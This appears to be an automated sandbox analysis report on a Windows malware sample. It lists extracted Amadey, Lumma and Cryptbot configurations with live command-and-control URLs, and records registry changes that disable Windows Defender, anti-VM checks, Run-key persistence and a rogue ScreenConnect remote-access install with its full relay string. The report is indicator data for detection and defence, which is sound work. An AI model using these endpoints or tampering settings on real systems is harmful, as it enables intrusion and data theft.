Analysis
- max time kernel: 148s
- max time network: 146s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 19-12-2024 23:13
- Static task: static1
General
- Target: file.exe
- Size: 2.9MB
- MD5: 8c724813b4468960543fcbcb4635f74f
- SHA1: 23693d84c1441a3edc77686c5a613f747ccff8a6
- SHA256: 4cc2d946c5c43426f509193cb5bee665f59f46c795c4da045d3b5940d660e6d4
- SHA512: c10f32547cd5a5921fa826eb11d437887b13b75ecd6d4a284288e12498e9d5406a779fb2fa2632d38412b6310dc53fca530e59dc3b80db76165431b2cf405cfa
- SSDEEP: 49152:Zr515k/dk6Cw71eUMEdzK8Epe8C4IYilUBEhfqluQpq+K:5515k1klQ19LdzK8EpHICEc0aK
Malware Config

Extracted: amadey
- 4.42
- 9c9aa5
- http://185.215.113.43
- install_dir: abc3bc1985
- install_file: skotes.exe
- strings_key: 8a35cf2ea38c2817dba29a4b5b25dcf0
- url_paths: /Zu7JuNko/index.php

Extracted: lumma
- https://sordid-snaked.cyou/api
- https://awake-weaves.cyou/api
- https://wrathful-jammy.cyou/api
- https://debonairnukk.xyz/api
- https://diffuculttan.xyz/api
- https://effecterectz.xyz/api
- https://deafeninggeh.biz/api
- https://immureprech.biz/api

Extracted: cryptbot

Signatures
- Amadey family
- Cryptbot family
- Lumma family

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | cd12090932.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | cd12090932.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | cd12090932.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | cd12090932.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | cd12090932.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | cd12090932.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 5840 created 1196 | 5840 | a1740268cc.exe | 21
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | 02e4c18c72.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 02d487f7c7.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | a1740268cc.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 02e4c18c72.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 8d2b699a41.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 530b5596f6.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | cf68e84021.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | file.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 08d1669db1.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | cd12090932.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
680 | powershell.exe
3744 | powershell.exe
5356 | powershell.exe
2056 | powershell.exe
1524 | powershell.exe
6692 | powershell.exe
Downloads MZ/PE file
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (98a59bd0eed9222b)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=gips620.top&p=8880&s=7333f63c-2cb1-4fe8-acd5-211dab881baa&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAv4vUqiMJYUqShVJV5O3m5AAAAAACAAAAAAAQZgAAAAEAACAAAADtK7B16tzBgEE6LNlWox4YPwlI7nHf5ZbPp8V8oLXkAwAAAAAOgAAAAAIAACAAAAAN4oO%2fifTyTHiaGTx4c9JmvUlVN%2b9NSn648KPMQP5NR6AEAACY8TWvAeK%2bEmOyzHj5PpC9EmFvYqF3CXjTDwLMRxivWMeYJ4nuUo21p4XzCGB%2fjsZGqV999odyPp9QLs7ogtofTIHXWddeOf%2fEBn03po7ScZfuhhxVINXxZUtA11%2bN3g2eR7wYswb%2bbb7PT8mIctwNUwpLjhSRXCAu8PNIpXMBFfwiFasAfxY9rFVXpXNvlN%2boJ%2f%2fSMRGlxqmLC2LfHOIgoeSP72Ns8CLnsnPkBnfPHUCD2ZhdqIjgv5UQ%2f11J6HvBCdzXVFMgdpI4DGKN6SYBcRC3MLb58jsdSCgzm%2bvzt%2fEFhpdHKuheX561cCGidQ3kOp5CqBMnWoxl4QI4F1OdZfvCtVP1NtccIETY1QBYcdQ1ASdPEcSlq%2bcW%2fCOqMRaFTxugkadDckh82kHK37fmmKEG%2fV5dhfZKAo%2fqcXZiVir%2f3vxaMTSlgpFWKyV2pmWdiK5v6e2EqDq4%2bqcE1RNP0ODQQSu16wgQADVsEaTRIepneI5cta92QpqFDuzkITg2aqSFpospX0JImm3vvZIEb2eNofPZXtlgaRRzrkWW5C4K3wz1ctf6LRgfH2qkRAyFlk7D0N1seJu8JgHH8WsDt2z9pHW6VXLdMINdJ%2bcWlUF8nPcx9dtE1io7mfgOEkKWp0fh9HxMwg7W8QFIJQd%2fRe%2bj%2bNDuN%2bvDccvgwdnaE6V2k3eD%2bsrwBhY84s5DLlupy4Dvn47q%2fvgWeR3m6fGNHN%2bZTsD8wJbhts%2bjt50n%2f93eV4sa1QJ%2bsC8daWtY2LJtbvnkXgBfSK2ZeukK49JEy7PG1k25m87KY%2fsakJXPRRJhlIDsplvGFbRji8kJOv4VCBC1zqY7Qqzi1vMw8DaRmuGtUlizUyKocn6KO8FBFzu3YvTnd8c8THWE5wHNi7DyFbUJ%2baEzCqNFNyE%2f248Ft8c7bOKlX7SoB72U5qdNvbKyhtkcejYF61wP7vUbtutkJBMNhHnLcS%2f2LgPnF6SwH92UIs3PkGl0xlhMUm0JfCfu60HrfKuHkhSkY4gAI%
2bau5fEXNjKD%2fpDMh7c5izU%2bRh3gXucc05%2bcOVQO8WuYzFjsZ5BvtyO2DbPTHVIjMoc4mz0E1efeDBdRODSkSlkF8vIOGAp3DChgDIowUVUzRUGThLFkNNMjN0%2b3sppTkxg2RDcp4m92WqNvUf9CJk8l2XVHjA6VJ8OL7Rr6z%2bGZsMZx3C3YiqmTpcwCwvc7HHHdBEw%2f%2f%2fJgj9lTFto6yqgFRiYax4mYR8VqfFLl5F39ntN8ZNXu2qi5aOnsmbgiligiWQzGBbI6XB9%2faNGuAUAy4AYkyUvhGiNOQTvm32ixnivky7bmabPL1z69kc95B41duKxV%2bCqpi4gQAWQzmg4HrW2wumowIOQDR49Emw%2bn7cl%2f3a%2bCGtOEDkSQ4pBiNimfvCeUJC9giDMCDv%2fB8q0HKkICGOdMqbak9ayt%2frVIr4TVXMfc0OM9NLoHLsdFnoFmes5HnEyrs2tueaW4bUbPgpzo2PG5D%2blDNFrgkZoa0OPQbU2VgKw17uOaBgwLbYzQxKfSOrSQcSBQ5vr7LQeujkzuD2KRra32XzCF3XAiLkAAAACYFrMF%2fgr%2fiFP%2flJhVWvn6qIo3SyjPENNjqzvVGWPQMYACCICtC%2bAHa8uX0sfz6JpALf2dFnpFbYo3urZNwSTw&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | cd12090932.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 08d1669db1.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 8d2b699a41.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 530b5596f6.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 08d1669db1.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | cf68e84021.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | cf68e84021.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 02e4c18c72.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 02e4c18c72.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 8d2b699a41.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | cd12090932.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | file.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 02d487f7c7.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | a1740268cc.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | a1740268cc.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | file.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 02d487f7c7.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 530b5596f6.exe
Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApproximateSize.vbs | UZAj8wc.exe
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
Executes dropped EXE 42 IoCs
pid | Process
2676 | skotes.exe
2992 | NN9Dd7c.exe
680 | ga70pjP.exe
1940 | INOKWGC.exe
1728 | 8ZVMneG.exe
2752 | 8ZVMneG.exe
2980 | UZAj8wc.exe
6788 | b0b45e7a6c.exe
2984 | ScreenConnect.ClientService.exe
3280 | 02d487f7c7.exe
4188 | ScreenConnect.WindowsClient.exe
4500 | ScreenConnect.WindowsClient.exe
4688 | 77ce657d01.exe
5260 | 08d1669db1.exe
5840 | a1740268cc.exe
6292 | ScreenConnect.WindowsClient.exe
6452 | 36e225cffd.exe
2316 | 8904b059d8.exe
3168 | 7z.exe
3212 | 7z.exe
3260 | 7z.exe
3300 | 7z.exe
3344 | 7z.exe
3380 | 7z.exe
3424 | 7z.exe
3460 | 7z.exe
3524 | in.exe
3536 | 77ce657d01.exe
3548 | 77ce657d01.exe
10348 | 02e4c18c72.exe
10664 | 1fdc12c3d0.exe
10800 | 8d2b699a41.exe
10980 | caee26767d.exe
11072 | caee26767d.exe
11224 | a009087586.exe
3756 | eb73c920fa.exe
6204 | 530b5596f6.exe
2112 | cf68e84021.exe
7128 | 5fd6925fa4.exe
2856 | 1fdc12c3d0.exe
3804 | cd12090932.exe
10068 | Intel_PTT_EK_Recertification.exe
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine | 8d2b699a41.exe
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine | file.exe
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine | skotes.exe
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine | a1740268cc.exe
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine | 02e4c18c72.exe
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine | cd12090932.exe
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine | 02d487f7c7.exe
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine | 08d1669db1.exe
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine | 530b5596f6.exe
Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine | cf68e84021.exe
Loads dropped DLL 64 IoCs
pid | Process
3036 | file.exe
2676 | skotes.exe
2676 | skotes.exe
376 | MsiExec.exe
640 | rundll32.exe
640 | rundll32.exe
640 | rundll32.exe
640 | rundll32.exe
640 | rundll32.exe
640 | rundll32.exe
640 | rundll32.exe
640 | rundll32.exe
640 | rundll32.exe
2676 | skotes.exe
2676 | skotes.exe
2676 | skotes.exe
1728 | 8ZVMneG.exe
2676 | skotes.exe
2676 | skotes.exe
2676 | skotes.exe
2208 | MsiExec.exe
1612 | MsiExec.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2676 | skotes.exe
2676 | skotes.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2676 | skotes.exe
2676 | skotes.exe
2676 | skotes.exe
2676 | skotes.exe
2676 | skotes.exe
2676 | skotes.exe
5940 | WerFault.exe
5940 | WerFault.exe
5940 | WerFault.exe
5940 | WerFault.exe
5940 | WerFault.exe
5840 | a1740268cc.exe
2676 | skotes.exe
2676 | skotes.exe
3096 | cmd.exe
3168 | 7z.exe
3096 | cmd.exe
3212 | 7z.exe
3096 | cmd.exe
3260 | 7z.exe
3096 | cmd.exe
3300 | 7z.exe
3096 | cmd.exe
3344 | 7z.exe
3096 | cmd.exe
3380 | 7z.exe
3096 | cmd.exe
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | cd12090932.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | cd12090932.exe
Adds Run key to start application 2 TTPs 4 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\5fd6925fa4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017997001\\5fd6925fa4.exe" | skotes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\cd12090932.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017998001\\cd12090932.exe" | skotes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\530b5596f6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017995001\\530b5596f6.exe" | skotes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\cf68e84021.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017996001\\cf68e84021.exe" | skotes.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/files/0x000500000001a4c2-3899.dat | autoit_exe
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390038006100350039006200640030006500650064003900320032003200620029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\uq50gpfl.tmp | ScreenConnect.ClientService.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\uq50gpfl.newcfg | ScreenConnect.ClientService.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid | Process
3036 | file.exe
2676 | skotes.exe
3280 | 02d487f7c7.exe
5260 | 08d1669db1.exe
5840 | a1740268cc.exe
10348 | 02e4c18c72.exe
10800 | 8d2b699a41.exe
6204 | 530b5596f6.exe
2112 | cf68e84021.exe
3804 | cd12090932.exe
Suspicious use of SetThreadContext 5 IoCs
description | pid | Process | procid_target
PID 1728 set thread context of 2752 | 1728 | 8ZVMneG.exe | 48
PID 4688 set thread context of 3548 | 4688 | 77ce657d01.exe | 89
PID 10980 set thread context of 11072 | 10980 | caee26767d.exe | 104
PID 10664 set thread context of 2856 | 10664 | 1fdc12c3d0.exe | 130
PID 10068 set thread context of 10204 | 10068 | Intel_PTT_EK_Recertification.exe | 138
resource | yara_rule
behavioral1/memory/3524-1665-0x000000013FC50000-0x00000001400E0000-memory.dmp | upx
Drops file in Program Files directory 19 IoCs
description | ioc | Process
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Windows.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\app.config | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Client.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe.config | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.en-US.resources | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.resources | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsCredentialProvider.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe.config | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.en-US.resources | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\system.config | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Core.dll | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe.config | msiexec.exe
File created | C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.resources | msiexec.exe
Drops file in Windows directory 16 IoCs
description | ioc | Process
File opened for modification | C:\Windows\Installer\f76f364.msi | msiexec.exe
File created | C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon | msiexec.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | DrvInst.exe
File opened for modification | C:\Windows\INF\setupapi.ev1 | DrvInst.exe
File created | C:\Windows\Installer\f76f364.msi | msiexec.exe
File created | C:\Windows\Installer\f76f365.ipi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIF4EB.tmp | msiexec.exe
File created | C:\Windows\Installer\wix{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}.SchedServiceConfig.rmi | MsiExec.exe
File opened for modification | C:\Windows\Installer\f76f365.ipi | msiexec.exe
File opened for modification | C:\Windows\INF\setupapi.ev3 | DrvInst.exe
File created | C:\Windows\Installer\f76f367.msi | msiexec.exe
File created | C:\Windows\Tasks\skotes.job | file.exe
File opened for modification | C:\Windows\Installer\MSIF4DA.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIF6FF.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
pid | pid_target | Process | procid_target
5940 | 2980 | WerFault.exe | 50
System Location Discovery: System Language Discovery 1 TTPs 44 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 36e225cffd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 77ce657d01.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1fdc12c3d0.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | NN9Dd7c.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | eb73c920fa.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 8ZVMneG.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 02e4c18c72.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | caee26767d.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cd12090932.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ga70pjP.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsiExec.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 77ce657d01.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1fdc12c3d0.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ScreenConnect.ClientService.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 02d487f7c7.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | a1740268cc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 530b5596f6.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 5fd6925fa4.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | 5fd6925fa4.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | 5fd6925fa4.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | skotes.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsiExec.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | caee26767d.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe
